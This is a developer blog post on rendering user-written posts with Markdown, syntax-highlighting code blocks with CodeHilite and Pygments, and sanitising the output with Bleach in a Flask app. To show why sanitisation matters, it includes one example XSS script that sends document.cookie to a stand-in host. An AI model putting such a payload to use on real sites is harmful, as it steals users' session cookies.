Creating posts with Markdown, Bleach, CodeHilite and Pygments

Saturday, 01 February 2020

Rendering Text

These posts are mainly written in Markdown, a markup language that formats text using a simple syntax and converts easily to HTML. This makes it ideal for displaying text on a webpage.

This approach doesn't restrict posts to Markdown alone, as HTML can also be used. Each has its benefits and shortcomings, but being able to use both covers almost all bases. For example, the two methods shown below produce the same output, which is displayed underneath each code block.


###*Cool Heading*
* point 1
* point 2

Cool | Table | Columns
--- | --- | ---
a | b | c
1 | 2 | 3

Cool Heading

  • point 1
  • point 2

Cool | Table | Columns --- | --- | --- a | b | c 1 | 2 | 3


<h3><i>Cool Heading</i></h3>
<ul>
   <li>point 1</li>
   <li>point 2</li>
</ul>
<table class="table table-striped table-bordered">
   <thead>
      <tr>
         <th>Cool</th>
         <th>Table</th>
         <th>Columns</th>
      </tr>
   </thead>
   <tbody>
      <tr>
         <td>a</td>
         <td>b</td>
         <td>c</td>
      </tr>
      <tr>
         <td>1</td>
         <td>2</td>
         <td>3</td>
      </tr>
   </tbody>
</table>

Cool Heading

  • point 1
  • point 2

Cool | Table | Columns
a | b | c
1 | 2 | 3

Even this small comparison shows that Markdown is slicker and easier to read than HTML, and this is especially true for larger chunks of text, hence the appeal. Markdown can be used in this way to easily create tables, lists, code blocks and other useful snippets that can be found in this cheatsheet.

While the HTML example is chunkier and achieves much the same thing, the one difference is the class added to the table, which allows for much better presentation. This kind of flexibility is not available when using Markdown and can go a long way in terms of control over appearance. Having both options available is a great way to go.
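The Markdown sample above can be converted to HTML with the Python markdown package. This is a minimal sketch, assuming the package is installed and that its bundled "extra" extension is used to enable tables; the variable names are illustrative only.

```python
from markdown import markdown

# The Markdown sample from earlier in this post.
source = """###*Cool Heading*
* point 1
* point 2

Cool | Table | Columns
--- | --- | ---
a | b | c
1 | 2 | 3
"""

# "extra" bundles several extensions, including table support.
html = markdown(source, extensions=["extra"])
print(html)
```

The generated table carries no class attribute, which is the limitation described above.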


Sanitising Text

Presenting users with the ability to create posts with HTML tags offers them a little too much freedom. They could easily take advantage by using tags that aren't just for styling text and instead inject their own code, for example to steal other users' cookies whenever they visit the post.


<script type="text/javascript"> 
document.write("<iframe src='http://totallysafeplace.com/storethis?cookie="+document.cookie+"'></iframe>");
</script>

So the goal is to restrict the tags that can be used while keeping at least some creative freedom for the writer. Enter Bleach, a sanitising library that can strip or escape unwanted HTML from text before it gets stored. In this case, a whitelist of tags, styles and attributes has been created that allows for most common text formatting approaches. Any tags that are not in the whitelist will be escaped and just appear as plain text.


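import bleach

# Tags that may appear in a post; anything else is escaped.
allowed_tags = [
    "h1", "h2", "h3", "h4", "h5", "h6", "em", "strong"
]

# lots_of_html is the raw post text supplied by the user.
sanitised_text = bleach.clean(lots_of_html, tags=allowed_tags)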
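To see the escaping in action, here is a small sketch that assumes Bleach is installed. The input string is hypothetical and only stands in for something a user might submit.

```python
import bleach

allowed_tags = ["h1", "h2", "h3", "h4", "h5", "h6", "em", "strong"]

# Hypothetical user input: an allowed heading followed by a script tag.
user_html = "<h3>Hello</h3><script>alert(1)</script>"

# By default, tags outside the whitelist are escaped rather than removed.
sanitised = bleach.clean(user_html, tags=allowed_tags)
print(sanitised)
```

The heading survives as markup, while the script tag is turned into harmless text that the browser displays instead of executing.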

One consideration for this site is that code should be allowed inside code blocks (such as the script example above) but not in the rest of the post text. The text within a code block is converted to HTML-encoded characters, so when the post is sanitised it no longer looks like a disallowed tag; it's just text:


<script>x</script>

becomes:


<div class="codehilite" style="background: #f0f0f0">
   <pre style="line-height: 125%">
    <span></span>
    <span style="color: #062873; font-weight: bold">
      &lt;script&gt;
    </span>
    x
    <span style="color: #062873; font-weight: bold">
      &lt;/script&gt;
    </span>
  </pre>
</div>
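The same effect can be reproduced without highlighting. The sketch below assumes the markdown and bleach packages are installed and uses a plain indented code block; the whitelist here is a hypothetical one chosen just for this example.

```python
import bleach
from markdown import markdown

# Markdown treats text indented by four spaces as a code block.
post = "Some text.\n\n    <script>x</script>\n"

# Markdown entity-encodes the contents of the code block.
html = markdown(post)

# Bleach sees encoded text rather than a real script tag,
# so there is nothing for it to escape a second time.
cleaned = bleach.clean(html, tags=["p", "pre", "code"])
print(cleaned)
```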


Highlighting Text

The markdown module includes an extension called CodeHilite which, when combined with Pygments, can be used to add syntax highlighting to code blocks. Once imported, the desired style can be configured using CodeHiliteExtension options. In this case, line numbers have been disabled and noclasses has been used to specify that code blocks are highlighted using inline CSS generated by Pygments rather than an existing stylesheet.


from markdown import markdown
from markdown.extensions.codehilite import CodeHiliteExtension

code_css_class = "friendly"
hilite = CodeHiliteExtension(linenums=False, noclasses=True, pygments_style=code_css_class)
highlighted_text = markdown(some_sanitised_text, extensions=[hilite])

The pygments_style refers to a defined set of rules for the syntax highlighting. Several built-in styles are provided with Pygments, which can be previewed on their demo page, or a custom one can be written by subclassing the Pygments Style class.
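As a rough illustration of a custom style, the sketch below subclasses the Pygments Style class and uses it directly with Pygments. The class name PostStyle and its colours are made up for this example and are not the style used on this site.

```python
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import PythonLexer
from pygments.style import Style
from pygments.token import Comment, Keyword, String


class PostStyle(Style):
    """Hypothetical style; colours chosen for illustration only."""

    background_color = "#f0f0f0"
    styles = {
        Comment: "italic #60a0b0",
        Keyword: "bold #062873",
        String: "#4070a0",
    }


# noclasses=True writes the colours as inline CSS on each span.
formatter = HtmlFormatter(style=PostStyle, noclasses=True)
code = "def f():\n    return 'x'  # comment\n"
html = highlight(code, PythonLexer(), formatter)
print(html)
```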

There is also a great variety of lexers supported, which is how the highlighting can remain consistent across different languages. The lexer can be defined at the top of each code block using a shebang or, alternatively, Pygments is capable of guessing a lexer based on patterns in the text.
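The two ways of choosing a lexer can be tried with Pygments on its own. This is a small sketch assuming Pygments is installed; the sample text is hypothetical, and guessing is only a heuristic, so results on short or ambiguous snippets may vary.

```python
from pygments.lexers import get_lexer_by_name, guess_lexer

# Explicit choice: look the lexer up by its short name.
explicit = get_lexer_by_name("python")

# Heuristic choice: Pygments inspects the text, including any shebang line.
sample = "#!/usr/bin/env python\nprint('hello')\n"
guessed = guess_lexer(sample)

print(explicit.name, guessed.name)
```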


All Together

After importing the modules needed, the post object, self, gets passed to html_content, which reads the user-written content from self.content. The highlighting options are set as above, with the addition of ExtraExtension to allow the creation of tables using Markdown.

Then the content gets wrapped in Markup, which classes it as safe HTML. This avoids it being automatically escaped before it gets sanitised further down (see the Flask Markup documentation for an example). This Markup text now needs to be passed through Markdown to convert any Markdown syntax to HTML. This is also where the highlighting is generated and the extensions are used to convert Markdown tables to HTML tables.

The content is now all HTML, with inline CSS on each line inside code blocks, and the next step is to escape any tags, attributes or styles that are not specified in the whitelist. This uses the lists and dictionaries created earlier. The offending text could be removed completely by setting strip to True; however, this would lead to missing lines in code blocks.
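The difference between escaping and stripping, and the use of an attribute dictionary, can be sketched as follows. The whitelist and input are hypothetical stand-ins, since the real lists and dictionaries are not shown in this post.

```python
import bleach

# Hypothetical whitelists for illustration only.
tags = ["p", "em"]
attributes = {"p": ["class"]}  # only class is allowed, and only on <p>

html = '<p class="lead" onclick="x()">hi</p><script>x</script>'

# strip=False (the default) escapes disallowed tags so they show as text.
escaped = bleach.clean(html, tags=tags, attributes=attributes, strip=False)

# strip=True removes the disallowed tags and keeps only their contents.
stripped = bleach.clean(html, tags=tags, attributes=attributes, strip=True)

print(escaped)
print(stripped)
```

In both cases the disallowed onclick attribute is dropped while the permitted class attribute is kept.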

Finally, the sanitised HTML gets marked as safe again using Markup so it can be stored and rendered in the page as HTML.


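import bleach
from flask import Markup
from markdown import markdown
from markdown.extensions.extra import ExtraExtension
from markdown.extensions.codehilite import CodeHiliteExtension


def html_content(self):
    # markdown_tags, markdown_attributes and markdown_styles are the
    # whitelists created earlier.

    # Inline Pygments CSS, no line numbers, plus Markdown tables via "extra".
    code_css_class = "friendly"
    hilite = CodeHiliteExtension(linenums=False, noclasses=True, pygments_style=code_css_class)
    extras = ExtraExtension()

    # Mark the raw content as safe so it is not escaped before sanitising.
    pre_sanitised = Markup(self.content)
    # Convert Markdown to HTML and highlight code blocks.
    markdown_content = markdown(pre_sanitised, extensions=[hilite, extras])
    # Escape (rather than strip) anything outside the whitelists.
    post_sanitised = bleach.clean(markdown_content, tags=markdown_tags, attributes=markdown_attributes, styles=markdown_styles, strip=False)

    # Mark the sanitised HTML as safe so it renders as HTML in the page.
    post_markup = Markup(post_sanitised)
    return post_markup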

